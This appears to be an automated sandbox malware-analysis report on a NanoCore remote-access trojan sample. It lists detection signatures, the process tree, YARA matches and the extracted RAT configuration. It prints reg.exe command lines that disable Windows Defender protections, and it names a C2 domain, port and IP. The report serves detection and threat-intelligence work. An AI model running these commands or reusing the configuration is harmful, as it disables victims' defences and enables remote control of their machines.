
Analysis Report 01d32b29_by_Libranalysis

Overview

General Information

Sample Name: 01d32b29_by_Libranalysis (renamed file extension from none to exe)
Analysis ID: 412429
MD5: 01d32b29cf20b16e7dc745f01168bdd5
SHA1: 2603699a808a1ac0a2af21c6496acab3be0aa7c9
SHA256: e94c70d3dc3ab2496465e73bffc7c5f1bc3963f3ae309a88d5e16d5e54a540ce
Tags: NanoCore

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
Yara detected Nanocore RAT
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Uses cmd line tools excessively to alter registry or file data
Uses dynamic DNS services
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara signature match

Startup

  • System is w10x64
  • 01d32b29_by_Libranalysis.exe (PID: 6424 cmdline: 'C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe' MD5: 01D32B29CF20B16E7DC745F01168BDD5)
    • Main.exe (PID: 6492 cmdline: 'C:\Users\user\Desktop\Main.exe' MD5: 443089CA423FC51A74E6F64B4A910E04)
      • cmd.exe (PID: 6552 cmdline: 'C:\Windows\system32\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\DFA1.tmp\DFA2.tmp\DFA3.bat C:\Users\user\Desktop\Main.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • reg.exe (PID: 6620 cmdline: Reg.exe query 'HKU\S-1-5-19\Environment' MD5: E3DACF0B31841FA02064B4457D44B357)
        • reg.exe (PID: 6732 cmdline: Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableAntiSpyware' /t REG_DWORD /d '1' /f MD5: E3DACF0B31841FA02064B4457D44B357)
        • reg.exe (PID: 6792 cmdline: Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableBehaviorMonitoring' /t REG_DWORD /d '1' /f MD5: E3DACF0B31841FA02064B4457D44B357)
        • reg.exe (PID: 6840 cmdline: Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableOnAccessProtection' /t REG_DWORD /d '1' /f MD5: E3DACF0B31841FA02064B4457D44B357)
        • reg.exe (PID: 6920 cmdline: Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableScanOnRealtimeEnable' /t REG_DWORD /d '1' /f MD5: E3DACF0B31841FA02064B4457D44B357)
        • reg.exe (PID: 6956 cmdline: Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableAntiSpyware' /t REG_DWORD /d '1' /f MD5: E3DACF0B31841FA02064B4457D44B357)
          • conhost.exe (PID: 6976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • reg.exe (PID: 6992 cmdline: Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableRoutinelyTakingAction' /t REG_DWORD /d '1' /f MD5: E3DACF0B31841FA02064B4457D44B357)
    • Service.exe (PID: 6520 cmdline: 'C:\Users\user\Desktop\Service.exe' MD5: A54512682E96BF7475C189E0D85C4B1F)
  • dhcpmon.exe (PID: 7056 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: A54512682E96BF7475C189E0D85C4B1F)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "f0ee6c15-7813-4f2f-a8f4-f86f2a48", "Group": "Default", "Domain1": "likedoingthis.ddns.net", "Domain2": "", "Port": 1337, "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\Desktop\Service.exe | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x1018d:$x1: NanoCore.ClientPluginHost
  • 0x101ca:$x2: IClientNetworkHost
  • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
C:\Users\user\Desktop\Service.exe | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0xff05:$x1: NanoCore Client.exe
  • 0x1018d:$x2: NanoCore.ClientPluginHost
  • 0x117c6:$s1: PluginCommand
  • 0x117ba:$s2: FileCommand
  • 0x1266b:$s3: PipeExists
  • 0x18422:$s4: PipeCreated
  • 0x101b7:$s5: IClientLoggingHost
C:\Users\user\Desktop\Service.exe | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
C:\Users\user\Desktop\Service.exe | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
  • 0xfef5:$a: NanoCore
  • 0xff05:$a: NanoCore
  • 0x10139:$a: NanoCore
  • 0x1014d:$a: NanoCore
  • 0x1018d:$a: NanoCore
  • 0xff54:$b: ClientPlugin
  • 0x10156:$b: ClientPlugin
  • 0x10196:$b: ClientPlugin
  • 0x1007b:$c: ProjectData
  • 0x10a82:$d: DESCrypto
  • 0x1844e:$e: KeepAlive
  • 0x1643c:$g: LogClientMessage
  • 0x12637:$i: get_Connected
  • 0x10db8:$j: #=q
  • 0x10de8:$j: #=q
  • 0x10e04:$j: #=q
  • 0x10e34:$j: #=q
  • 0x10e50:$j: #=q
  • 0x10e6c:$j: #=q
  • 0x10e9c:$j: #=q
  • 0x10eb8:$j: #=q
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x1018d:$x1: NanoCore.ClientPluginHost
  • 0x101ca:$x2: IClientNetworkHost
  • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe

Memory Dumps

Source | Rule | Description | Author | Strings
00000010.00000002.377390680.0000000004421000.00000004.00000001.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
00000010.00000002.377390680.0000000004421000.00000004.00000001.sdmp | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
  • 0x49395:$a: NanoCore
  • 0x493ee:$a: NanoCore
  • 0x4942b:$a: NanoCore
  • 0x494a4:$a: NanoCore
  • 0x5cb4f:$a: NanoCore
  • 0x5cb64:$a: NanoCore
  • 0x5cb99:$a: NanoCore
  • 0x755fb:$a: NanoCore
  • 0x75610:$a: NanoCore
  • 0x75645:$a: NanoCore
  • 0x493f7:$b: ClientPlugin
  • 0x49434:$b: ClientPlugin
  • 0x49d32:$b: ClientPlugin
  • 0x49d3f:$b: ClientPlugin
  • 0x5c90b:$b: ClientPlugin
  • 0x5c926:$b: ClientPlugin
  • 0x5c956:$b: ClientPlugin
  • 0x5cb6d:$b: ClientPlugin
  • 0x5cba2:$b: ClientPlugin
  • 0x753b7:$b: ClientPlugin
  • 0x753d2:$b: ClientPlugin
00000002.00000000.332243003.0000000000902000.00000002.00020000.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0xff8d:$x1: NanoCore.ClientPluginHost
  • 0xffca:$x2: IClientNetworkHost
  • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000002.00000000.332243003.0000000000902000.00000002.00020000.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
00000002.00000000.332243003.0000000000902000.00000002.00020000.sdmp | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
  • 0xfcf5:$a: NanoCore
  • 0xfd05:$a: NanoCore
  • 0xff39:$a: NanoCore
  • 0xff4d:$a: NanoCore
  • 0xff8d:$a: NanoCore
  • 0xfd54:$b: ClientPlugin
  • 0xff56:$b: ClientPlugin
  • 0xff96:$b: ClientPlugin
  • 0xfe7b:$c: ProjectData
  • 0x10882:$d: DESCrypto
  • 0x1824e:$e: KeepAlive
  • 0x1623c:$g: LogClientMessage
  • 0x12437:$i: get_Connected
  • 0x10bb8:$j: #=q
  • 0x10be8:$j: #=q
  • 0x10c04:$j: #=q
  • 0x10c34:$j: #=q
  • 0x10c50:$j: #=q
  • 0x10c6c:$j: #=q
  • 0x10c9c:$j: #=q
  • 0x10cb8:$j: #=q

Unpacked PEs

Source | Rule | Description | Author | Strings
2.2.Service.exe.5310000.6.raw.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0xe75:$x1: NanoCore.ClientPluginHost
  • 0xe8f:$x2: IClientNetworkHost
2.2.Service.exe.5310000.6.raw.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0xe75:$x2: NanoCore.ClientPluginHost
  • 0x1261:$s3: PipeExists
  • 0x1136:$s4: PipeCreated
  • 0xeb0:$s5: IClientLoggingHost
2.2.Service.exe.41d2a15.5.raw.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0xb184:$x1: NanoCore.ClientPluginHost
  • 0x23c30:$x1: NanoCore.ClientPluginHost
  • 0xb1b1:$x2: IClientNetworkHost
  • 0x23c5d:$x2: IClientNetworkHost
2.2.Service.exe.41d2a15.5.raw.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0xb184:$x2: NanoCore.ClientPluginHost
  • 0x23c30:$x2: NanoCore.ClientPluginHost
  • 0xc25f:$s4: PipeCreated
  • 0x24d0b:$s4: PipeCreated
  • 0xb19e:$s5: IClientLoggingHost
  • 0x23c4a:$s5: IClientLoggingHost
2.2.Service.exe.41d2a15.5.raw.unpack | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security

Sigma Overview

AV Detection:

Sigma detected: NanoCore
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\Desktop\Service.exe, ProcessId: 6520, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud:

Sigma detected: NanoCore

Stealing of Sensitive Information:

Sigma detected: NanoCore

Remote Access Functionality:

Sigma detected: NanoCore

Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Avira: detection malicious, Label: TR/Dropper.MSIL.Gen7
Source: C:\Users\user\Desktop\Service.exe | Avira: detection malicious, Label: TR/Dropper.MSIL.Gen7
Found malware configuration
Source: 00000010.00000002.377390680.0000000004421000.00000004.00000001.sdmp | Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "f0ee6c15-7813-4f2f-a8f4-f86f2a48", "Group": "Default", "Domain1": "likedoingthis.ddns.net", "Domain2": "", "Port": 1337, "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Virustotal: Detection: 79%
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | ReversingLabs: Detection: 97%
Source: C:\Users\user\Desktop\Main.exe | ReversingLabs: Detection: 31%
Source: C:\Users\user\Desktop\Service.exe | ReversingLabs: Detection: 97%
Multi AV Scanner detection for submitted file
Source: 01d32b29_by_Libranalysis.exe | Virustotal: Detection: 48%
Source: 01d32b29_by_Libranalysis.exe | ReversingLabs: Detection: 55%
Yara detected Nanocore RAT
Source: Yara match | File source: 00000010.00000002.377390680.0000000004421000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.332243003.0000000000902000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.604957919.0000000005840000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.597461394.0000000000902000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.603266642.00000000041BA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.377356574.0000000003421000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.376298581.0000000000C62000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000000.357721819.0000000000C62000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Service.exe PID: 6520, type: MEMORY
Source: Yara match | File source: Process Memory Space: dhcpmon.exe PID: 7056, type: MEMORY
Source: Yara match | File source: C:\Users\user\Desktop\Service.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
Source: Yara match | File source: 2.2.Service.exe.41d2a15.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.0.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Service.exe.5844629.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Service.exe.41ce3ec.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.Service.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Service.exe.41ce3ec.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.dhcpmon.exe.4472a15.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Service.exe.5840000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.dhcpmon.exe.44695b6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.dhcpmon.exe.446e3ec.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Service.exe.5840000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Service.exe.41c95b6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Service.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.dhcpmon.exe.446e3ec.5.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\Service.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: 01d32b29_by_Libranalysis.exe | Joe Sandbox ML: detected
Source: 16.0.dhcpmon.exe.c60000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.0.Service.exe.900000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen7
Source: 16.2.dhcpmon.exe.c60000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.2.Service.exe.900000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.2.Service.exe.5840000.9.unpack | Avira: Label: TR/NanoCore.fadte
Source: 01d32b29_by_Libranalysis.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\Service.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: 01d32b29_by_Libranalysis.exe | Static PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb | source: 01d32b29_by_Libranalysis.exe
Source: Binary string: C:\Windows\mscorlib.pdb | source: Service.exe, 00000002.00000002.599360238.0000000002E36000.00000004.00000040.sdmp
Source: Binary string: lib.pdb | source: Service.exe, 00000002.00000002.599360238.0000000002E36000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb | source: Service.exe, 00000002.00000002.599360238.0000000002E36000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb | source: Service.exe, 00000002.00000002.599360238.0000000002E36000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb | source: Service.exe, 00000002.00000002.604812875.00000000055A0000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe | Code function: 0_2_0131A717 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe | Code function: 0_2_0132BA20 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe | Code function: 0_2_0133AC28 FindFirstFileExA,
Source: C:\Users\user\Desktop\Main.exe | File opened: C:\Users\user\AppData\Local\Temp\DFA1.tmp
Source: C:\Users\user\Desktop\Main.exe | File opened: C:\Users\user\AppData\Local\Temp\DFA1.tmp\DFA2.tmp
Source: C:\Users\user\Desktop\Main.exe | File opened: C:\Users\user\AppData\Local\Temp\DFA1.tmp\DFA2.tmp\DFA3.tmp
Source: C:\Users\user\Desktop\Main.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\Main.exe | File opened: C:\Users\user\
Source: C:\Users\user\Desktop\Main.exe | File opened: C:\Users\user\AppData\

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs:
Source: Malware configuration extractor | URLs: likedoingthis.ddns.net
Uses dynamic DNS services
Source: unknown | DNS query: name: likedoingthis.ddns.net
Source: global traffic | TCP traffic: 192.168.2.6:49708 -> 91.109.188.5:1337
Source: Joe Sandbox View | ASN Name: IELOIELOMainNetworkFR IELOIELOMainNetworkFR
Source: unknown | DNS traffic detected: queries for: likedoingthis.ddns.net
Source: Service.exe, 00000002.00000002.598615106.000000000102B000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: Service.exe, 00000002.00000002.604957919.0000000005840000.00000004.00000001.sdmp | Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000010.00000002.377390680.0000000004421000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000002.00000000.332243003.0000000000902000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000002.00000000.332243003.0000000000902000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000002.00000002.604957919.0000000005840000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000002.00000002.597461394.0000000000902000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000002.00000002.597461394.0000000000902000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000002.00000002.603266642.00000000041BA000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000002.00000002.604469931.0000000005310000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000010.00000002.377356574.0000000003421000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000010.00000002.376298581.0000000000C62000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000010.00000002.376298581.0000000000C62000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000010.00000000.357721819.0000000000C62000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000010.00000000.357721819.0000000000C62000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: Process Memory Space: Service.exe PID: 6520, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: Process Memory Space: Service.exe PID: 6520, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: Process Memory Space: dhcpmon.exe PID: 7056, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: Process Memory Space: dhcpmon.exe PID: 7056, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: C:\Users\user\Desktop\Service.exe, type: DROPPEDMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: C:\Users\user\Desktop\Service.exe, type: DROPPEDMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPEDMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPEDMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.Service.exe.5310000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 2.2.Service.exe.41d2a15.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 16.0.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 16.0.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.Service.exe.5844629.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 2.2.Service.exe.41ce3ec.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 2.0.Service.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 2.0.Service.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.Service.exe.41ce3ec.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 16.2.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 16.2.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 16.2.dhcpmon.exe.4472a15.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 2.2.Service.exe.5840000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 16.2.dhcpmon.exe.44695b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 16.2.dhcpmon.exe.44695b6.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 16.2.dhcpmon.exe.3443dc4.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 2.2.Service.exe.3191770.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 16.2.dhcpmon.exe.446e3ec.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 2.2.Service.exe.5840000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 2.2.Service.exe.41c95b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 2.2.Service.exe.41c95b6.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.Service.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 2.2.Service.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 16.2.dhcpmon.exe.446e3ec.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_02E0131A NtQuerySystemInformation,
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_02E012DF NtQuerySystemInformation,
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0131710E: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: 0_2_01326776
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: 0_2_01318631
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: 0_2_013271EF
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: 0_2_0133D1CE
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: 0_2_013310D8
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: 0_2_0131E3C0
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: 0_2_01313206
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: 0_2_013412D4
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: 0_2_01330456
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: 0_2_0131276D
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: 0_2_0131E9C0
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: 0_2_0133487A
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: 0_2_0133086E
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: 0_2_013238F1
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: 0_2_01323B6C
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: 0_2_01326BAB
